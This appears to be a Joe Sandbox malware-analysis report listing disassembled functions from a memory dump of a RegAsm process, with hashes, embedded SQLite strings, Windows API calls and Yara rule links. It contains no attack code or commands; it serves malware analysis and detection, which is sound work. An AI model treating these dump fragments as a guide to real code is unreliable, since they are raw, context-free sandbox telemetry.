Opcode ID: 4b0a7b29482c5c8c04a4a7c7c80549280d21d45c0bd01c5b42b9f53177e5d606
Instruction ID: 0574bb6e3b73e9a038a72dba0838c600bb222626964de3aeae32fbeeeade1c55
Opcode Fuzzy Hash: 4b0a7b29482c5c8c04a4a7c7c80549280d21d45c0bd01c5b42b9f53177e5d606
Instruction Fuzzy Hash: 72316A266447D156D7218B28F8407E6B7E19FA171AF4C44AEE4C5876CAE3A2E882C371

Uniqueness

Uniqueness Score: -1.00%

Function 19D67ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 19D67F92
no such tokenizer: %s, xrefs: 19D67F1B

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 9df9f78d6a89efd45837ccce6b8014ecb28d7a1f981879b48885f764e3db0746
Instruction ID: 7299cacee83c90f727fda443c71346f4575324c128604d15f08a451021e6a32e
Opcode Fuzzy Hash: 9df9f78d6a89efd45837ccce6b8014ecb28d7a1f981879b48885f764e3db0746
Instruction Fuzzy Hash: 04319E767003198FCB20CF1DD880A6AB7E4EF84665F1A456DE989DB750E732E805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 19C4F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 19C4F0C4

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: 341c2311bf749db825be7c45d2d3da50f5eac98a92f47d048f0cfaff89bbdaa1
Instruction ID: 979b7d3d2b5bc2af9cb240e713bf645ada917e2fb8c9de7057bfcdf22ee93581
Opcode Fuzzy Hash: 341c2311bf749db825be7c45d2d3da50f5eac98a92f47d048f0cfaff89bbdaa1
Instruction Fuzzy Hash: 15312B76A002039BDB109F14FC4161677B0FF81720F6C8525E8E5A72C1EB22F9549692

Uniqueness

Uniqueness Score: -1.00%

Function 19C85280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C852F2
database corruption, xrefs: 19C852FC
%s at line %d of [%.10s], xrefs: 19C85301

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: df0fe2a2da287535863ce335b22af1e4a047a8645c733de14fb7886096163015
Instruction ID: f8cf26c79a07c7b64b595628a122e4b4c98264c552e029fa802367d1223ee7ed
Opcode Fuzzy Hash: df0fe2a2da287535863ce335b22af1e4a047a8645c733de14fb7886096163015
Instruction Fuzzy Hash: 9211873B60010067CB105A59FC00CDBBFE5DFC42B6F1D4565FA8857522D623D820D3B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C4B220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C4B229
misuse, xrefs: 19C4B233
%s at line %d of [%.10s], xrefs: 19C4B238

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 2f515726ae04a8d5a7753a0397be8ac0452dd87b26f5d3415abce92a1524a654
Instruction ID: a183065f6751ebc9d1e79c9472d810765fc15d25b7eda5da51a26bc495057d0d
Opcode Fuzzy Hash: 2f515726ae04a8d5a7753a0397be8ac0452dd87b26f5d3415abce92a1524a654
Instruction Fuzzy Hash: CF1102B6700702ABD711DB28FC84E9F7BEDAFC0254F5D4428F89893252EB30E50483A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C5F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 19C5F8ED

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 6547fe981d0d16b702ac42b171a99866890f10a5225e62d50d9c4be5f2a68645
Instruction ID: fb8dcc499599f421073ca96ef24b428bebeae302105b868ece69e41107323951
Opcode Fuzzy Hash: 6547fe981d0d16b702ac42b171a99866890f10a5225e62d50d9c4be5f2a68645
Instruction Fuzzy Hash: 1A112636E04B126BEB05AF24BC01B8637A15F13324F0D4359E4D61A1E6EB6091C4C3D6

Uniqueness

Uniqueness Score: -1.00%

Function 19CF1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 19CF1F92

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 3b64b9589f21eb8cc5024d6ebd13eb92b0a1eac46b21adf43c373e839ed647af
Instruction ID: f56c292419c41776124a9e46f2dfd78c1a18675f60d4a7a7e37c23441969b6b8
Opcode Fuzzy Hash: 3b64b9589f21eb8cc5024d6ebd13eb92b0a1eac46b21adf43c373e839ed647af
Instruction Fuzzy Hash: C4010472A092116FDB149B54AC01B9B7BD5EF82330F28466CF8D6972D0DB71E80193E2

Uniqueness

Uniqueness Score: -1.00%

Function 19C51DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C51E53
misuse, xrefs: 19C51E59
%s at line %d of [%.10s], xrefs: 19C51E63

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 0b6bad9890e21327fca30ac1f770fbb0f22133cee3df3acc5b5eaf21c1f06f01
Instruction ID: 11ba7c5368a26e592727796560a62d2f17c13c6208bc0e1c4abfd81ad7815c13
Opcode Fuzzy Hash: 0b6bad9890e21327fca30ac1f770fbb0f22133cee3df3acc5b5eaf21c1f06f01
Instruction Fuzzy Hash: DB11E734708590DFE714CE29E88CE56BBB8BF81795F0C8458E086CB362D3B0D905C796

Uniqueness

Uniqueness Score: -1.00%

Function 19C6F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19C6F105

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: b403bcea6c41395cc75775f1f7d7113e263b0eff535a1cfcf7969ec6030d5bff
Instruction ID: 03fa6e86fda955a20020b9adb857b30c1383fa62f42336b7358234514942dbb7
Opcode Fuzzy Hash: b403bcea6c41395cc75775f1f7d7113e263b0eff535a1cfcf7969ec6030d5bff
Instruction Fuzzy Hash: 85019A7B3042425FD321866EFC80F97BBE8EBC4321F09046AF5EDC3211D661A88583A1

Uniqueness

Uniqueness Score: -1.00%

Function 19CB9180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 19CB9192

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: ab9c6f8261d290416bb4867aecfdd6d96203cac29bf30466b761416ced8120d4
Instruction ID: 1a2b18b157f42a0ea311d53bcde97eb68c53ceb66198d49bccb9907cca650e58
Opcode Fuzzy Hash: ab9c6f8261d290416bb4867aecfdd6d96203cac29bf30466b761416ced8120d4
Instruction Fuzzy Hash: ADF02733B056623BEB008679FD40B86FBD5AF841B0F5D8625E48C93154C712BCD19391

Uniqueness

Uniqueness Score: -1.00%

Function 19C67F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19C67F76

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 523df4280a428535cacda5d42624b6ec75783d606ec40c4aa4a652835e8a62ce
Instruction ID: bd39e55cd481e9e82d700a18af24567dc21cd28d9f172b4d6da0a25ec4c1d4c2
Opcode Fuzzy Hash: 523df4280a428535cacda5d42624b6ec75783d606ec40c4aa4a652835e8a62ce
Instruction Fuzzy Hash: E1F0CD3B74430287D7015B18FC02B89A791AFD0321F2D4529F884962A0FB60A88583A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C67DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9501ecaf34fe44904e44a06153c4f6225902612867c112cd58bde294f18817b3
Instruction ID: a1a44e2141e8d5dabfdb5356fa3ef3158c5358efb0b03880a71a8f30289a506f
Opcode Fuzzy Hash: 9501ecaf34fe44904e44a06153c4f6225902612867c112cd58bde294f18817b3
Instruction Fuzzy Hash: 7741B1766007019FD314CF18E980A52F7E5FF84324F28896EE98687B61E772F855CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004105E0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
GetLastError.KERNEL32(?,?,00000001), ref: 00410610
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648

Part of subcall function 00411470: GetProcessHeap.KERNEL32(00000000,?,?,0041067B,00000000,?,?,00000001), ref: 0041147D
Part of subcall function 00411470: HeapFree.KERNEL32(00000000,?,0041067B,00000000,?,?,00000001), ref: 00411484

wsprintfA.USER32 ref: 00410692

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
String ID:
API String ID: 837085947-0
Opcode ID: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction ID: 366bb74dd286f18a7a484b3067aafd1d3a88729660cbb4a48cba89bc7db310ad
Opcode Fuzzy Hash: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction Fuzzy Hash: 69210676E02128A7D7209A59BC40AFF77A8EF82714F14017BFC08D7201D7798EE582D9

Uniqueness

Uniqueness Score: -1.00%

Function 19C6B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: 302c94702b189e3916cc1528e27cbdea4ec9aa782f7c5a848af6e652c4179afd
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: 2831A276508B819FD320CB25F88069BB7E1BF95314F19892DD4DA87A52D732F488C792

Uniqueness

Uniqueness Score: -1.00%

Function 0041A729 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041A74F

Part of subcall function 0041A57B: __fltout2.LIBCMT ref: 0041A5A6

__cftog_l.LIBCMT ref: 0041A775
__cftoe_l.LIBCMT ref: 0041A7A7

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 5caa51e322e81af1be4ceadbe4ea236f7c28ba83958f91cc1dc79586f8736deb
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: CE114B3600114ABBCF126E95CC458EE3F32BB1D354B598416FA2859171D33ACAB2AB86

Uniqueness

Uniqueness Score: -1.00%

Function 00410300 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
wsprintfA.USER32 ref: 0041034D

Memory Dump Source

